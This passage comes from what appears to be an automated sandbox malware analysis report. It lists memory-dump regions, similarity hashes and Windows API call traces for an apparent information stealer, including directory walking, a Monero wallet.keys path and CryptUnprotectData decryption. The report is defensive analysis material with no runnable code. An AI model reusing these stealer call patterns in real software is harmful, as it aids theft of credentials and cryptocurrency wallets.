                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                  • String ID: \*.*
                                  • API String ID: 2325840235-1173974218
                                  • Opcode ID: b867883bad7293443f1d0cb493309da50e141889d73c92a4e384b296900c12d4
                                  • Instruction ID: 78e2097d67b2f1565d352956813cecf892adb6749000f36ed5c27ec088811d5a
                                  • Opcode Fuzzy Hash: b867883bad7293443f1d0cb493309da50e141889d73c92a4e384b296900c12d4
                                  • Instruction Fuzzy Hash: 14F1C0729141189ACB19FB60DC95EEE7378BF54301F8466E9A81A72091EF306F8DCF51
                                  APIs
                                    • Part of subcall function 00E5A740: lstrcpy.KERNEL32(00E60E17,00000000), ref: 00E5A788
                                    • Part of subcall function 00E5A920: lstrcpy.KERNEL32(00000000,?), ref: 00E5A972
                                    • Part of subcall function 00E5A920: lstrcat.KERNEL32(00000000), ref: 00E5A982
                                    • Part of subcall function 00E5A9B0: lstrlen.KERNEL32(?,01CB97A0,?,\Monero\wallet.keys,00E60E17), ref: 00E5A9C5
                                    • Part of subcall function 00E5A9B0: lstrcpy.KERNEL32(00000000), ref: 00E5AA04
                                    • Part of subcall function 00E5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AA12
                                    • Part of subcall function 00E5A8A0: lstrcpy.KERNEL32(?,00E60E17), ref: 00E5A905
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00E614B0,00E60C2A), ref: 00E4DAEB
                                  • StrCmpCA.SHLWAPI(?,00E614B4), ref: 00E4DB33
                                  • StrCmpCA.SHLWAPI(?,00E614B8), ref: 00E4DB49
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00E4DDCC
                                  • FindClose.KERNEL32(000000FF), ref: 00E4DDDE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID:
                                  • API String ID: 3334442632-0
                                  • Opcode ID: bb28b6528cfd17811788b5df35271e0988a845b4095c88f331359d2110ed9bcb
                                  • Instruction ID: 3558f9f66e6ce82107d7833de88637138a912d89fe226760d328db9eb950a7e6
                                  • Opcode Fuzzy Hash: bb28b6528cfd17811788b5df35271e0988a845b4095c88f331359d2110ed9bcb
                                  • Instruction Fuzzy Hash: 74915472A0010497CB14FF70EC569ED77BCAB88301F449A69FD4AB7145EE349B4D8B92
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                   • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: ]o$0I?$G5Y'$\_{k$^V?$n3~$t&^${!qn
                                  • API String ID: 0-700155458
                                  • Opcode ID: d3e450c94ec49747832adf12c7499c8059aba9eaa0af27c2522bda211c9a1f66
                                  • Instruction ID: 1f6ba5c24933cba60d1c9135705c84f329be26c83fad3154877520c2c970371d
                                  • Opcode Fuzzy Hash: d3e450c94ec49747832adf12c7499c8059aba9eaa0af27c2522bda211c9a1f66
                                  • Instruction Fuzzy Hash: 3BB237F3A0C2049FE304AE2DEC8577ABBE9EF94320F1A453DE6C5C7744E93558018696
                                  APIs
                                    • Part of subcall function 00E5A740: lstrcpy.KERNEL32(00E60E17,00000000), ref: 00E5A788
                                  • GetKeyboardLayoutList.USER32(00000000,00000000,00E605AF), ref: 00E57BE1
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00E57BF9
                                  • GetKeyboardLayoutList.USER32(?,00000000), ref: 00E57C0D
                                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00E57C62
                                  • LocalFree.KERNEL32(00000000), ref: 00E57D22
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                   • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                  • String ID: /
                                  • API String ID: 3090951853-4001269591
                                  • Opcode ID: 59feaa5f4452da3b9a5ad5b0a126daf2bbe9d38d7e258a0f73409ed5a5635ce4
                                  • Instruction ID: ada53029ecdc0b0ff7917a69cc2a2dad215df0fc9b4717590c0084e020d811ac
                                  • Opcode Fuzzy Hash: 59feaa5f4452da3b9a5ad5b0a126daf2bbe9d38d7e258a0f73409ed5a5635ce4
                                  • Instruction Fuzzy Hash: 8D414E71944218ABCB24DB54DC99BEEB3B4FF48701F104699E80972180DB342F89CFA1
                                  APIs
                                    • Part of subcall function 00E5A740: lstrcpy.KERNEL32(00E60E17,00000000), ref: 00E5A788
                                    • Part of subcall function 00E5A920: lstrcpy.KERNEL32(00000000,?), ref: 00E5A972
                                    • Part of subcall function 00E5A920: lstrcat.KERNEL32(00000000), ref: 00E5A982
                                    • Part of subcall function 00E5A9B0: lstrlen.KERNEL32(?,01CB97A0,?,\Monero\wallet.keys,00E60E17), ref: 00E5A9C5
                                    • Part of subcall function 00E5A9B0: lstrcpy.KERNEL32(00000000), ref: 00E5AA04
                                    • Part of subcall function 00E5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AA12
                                    • Part of subcall function 00E5A8A0: lstrcpy.KERNEL32(?,00E60E17), ref: 00E5A905
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00E60D73), ref: 00E4E4A2
                                  • StrCmpCA.SHLWAPI(?,00E614F8), ref: 00E4E4F2
                                  • StrCmpCA.SHLWAPI(?,00E614FC), ref: 00E4E508
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00E4EBDF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                   • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                  • String ID: \*.*
                                  • API String ID: 433455689-1173974218
                                  • Opcode ID: 533c7c4bd7d00b4b5ad22d18a881d83ee2b0467c6216090c59743dafb86e5274
                                  • Instruction ID: ac2b8470638e4babcf23546db16f34d57b2b9e668ee2d3dfabee1c9441eacca3
                                  • Opcode Fuzzy Hash: 533c7c4bd7d00b4b5ad22d18a881d83ee2b0467c6216090c59743dafb86e5274
                                  • Instruction Fuzzy Hash: 2C1246729101189ADB18FB60DC96EED73B9BF54301F445AB9B90A72081EF346F4DCB92
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                   • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: "^[$$ ~$0G/?$Vaw{$d8u$_
                                  • API String ID: 0-2460952986
                                  • Opcode ID: dc8e94737695879acfc08a70c5039ce605f3829b1eb9b93813bfc12754c838e1
                                  • Instruction ID: d8a2ef726d853a272a36183916d5f434600a123dd70f7888a859ab9378c7ac12
                                  • Opcode Fuzzy Hash: dc8e94737695879acfc08a70c5039ce605f3829b1eb9b93813bfc12754c838e1
                                  • Instruction Fuzzy Hash: FAB23AF3A0C2049FE3046E2DEC8567AFBEAEF94320F1A453DE6C4D3744E97598058696
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                   • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: AsWo$FoS$~|/$ik_$m,$:j
                                  • API String ID: 0-2283191893
                                  • Opcode ID: 7674ada3e99e8203aa6b70803612c715ea1f754f4f257e54981328c177f96e64
                                  • Instruction ID: 8e89f98f38a2becf0f07adbf1f3be46d4efa99509225b79717596d14cfe953d3
                                  • Opcode Fuzzy Hash: 7674ada3e99e8203aa6b70803612c715ea1f754f4f257e54981328c177f96e64
                                  • Instruction Fuzzy Hash: 66B2F6F360C2049FE304AE29EC8576AB7E9EF94320F1A493DEAC4C7744E67598018797
                                  APIs
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00E49AEF
                                  • LocalAlloc.KERNEL32(00000040,?,?,?,00E44EEE,00000000,?), ref: 00E49B01
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00E49B2A
                                  • LocalFree.KERNEL32(?,?,?,?,00E44EEE,00000000,?), ref: 00E49B3F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                   • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptLocalString$AllocFree
                                  • String ID: N
                                  • API String ID: 4291131564-1689755984
                                  • Opcode ID: 1ad4cad4ed9ebc98dd22f4dd5dd78a1bf1dfbc2b51b2ba95aebc6151861280bc
                                  • Instruction ID: 8dd4471c838957abd0849225a64808e4fd7b5d9864a26e1dc81951be118a3c88
                                  • Opcode Fuzzy Hash: 1ad4cad4ed9ebc98dd22f4dd5dd78a1bf1dfbc2b51b2ba95aebc6151861280bc
                                  • Instruction Fuzzy Hash: 0E11A4B4240208EFEB10CF64D895FAA77B5FB89704F208059FA159B384C776A901CB54
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                   • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 7%W$nP~$rV*c$us?V$}sl
                                  • API String ID: 0-367618750
                                  • Opcode ID: ec506795a10033a60362ee7ffc45f4d58072af18829bba4b9ecaac047bc00e4c
                                  • Instruction ID: 1074a998405f0bb2e265c39585dba27327992c8498666dd7089bd4b71c6c9d54
                                  • Opcode Fuzzy Hash: ec506795a10033a60362ee7ffc45f4d58072af18829bba4b9ecaac047bc00e4c
                                  • Instruction Fuzzy Hash: DBB229F36082109FE304AE2DEC8567AFBEAEFD4320F1A493DE6C5C7744E57598058692
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                   • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: ??o$-7u$\M(2$vb+s$zkWy
                                  • API String ID: 0-1090226411
                                  • Opcode ID: 7cd791347a6c92cc0bcf35e1b22451e6b47c98812094f66f23b4ed56939d4c26
                                  • Instruction ID: 3f0230c391c7160c0b5a05781a07260df6b563b231ff62c397b3dc19080a3d83
                                  • Opcode Fuzzy Hash: 7cd791347a6c92cc0bcf35e1b22451e6b47c98812094f66f23b4ed56939d4c26
                                  • Instruction Fuzzy Hash: 9FB2E4F3A0C204AFE704AE29EC8567AFBE5EF94320F16493DEAC583344E63558158797
                                  APIs
                                  • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00E4C871
                                  • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00E4C87C
                                  • lstrcat.KERNEL32(?,00E60B46), ref: 00E4C943
                                  • lstrcat.KERNEL32(?,00E60B47), ref: 00E4C957
                                  • lstrcat.KERNEL32(?,00E60B4E), ref: 00E4C978
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                   • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$BinaryCryptStringlstrlen
                                  • String ID:
                                  • API String ID: 189259977-0
                                  • Opcode ID: a04acdd14b0c9452e18d4c52223a29916fdda612d185e1866de3bbd203ab38e2
                                  • Instruction ID: 7aa8fffd51a8a2f6a523855f5765d473cba473af1a5b2e37edc5c11cb13c15c9
                                  • Opcode Fuzzy Hash: a04acdd14b0c9452e18d4c52223a29916fdda612d185e1866de3bbd203ab38e2
                                  • Instruction Fuzzy Hash: C941827590421AEFCB10DF90DC89BFEB7B8BB88304F1041A9E609B7284D7755A84CF91
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00E4724D
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00E47254
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00E47281
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00E472A4
                                  • LocalFree.KERNEL32(?), ref: 00E472AE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                  • String ID:
                                  • API String ID: 2609814428-0
                                  • Opcode ID: 4acc1d2df7cd87044bf7ac43df961875be12abe868bd1c05589977c81c49554b
                                  • Instruction ID: 66b9bafb98e0ae200fe29e197b7acd89912a428055595701a450df4f68b8652d
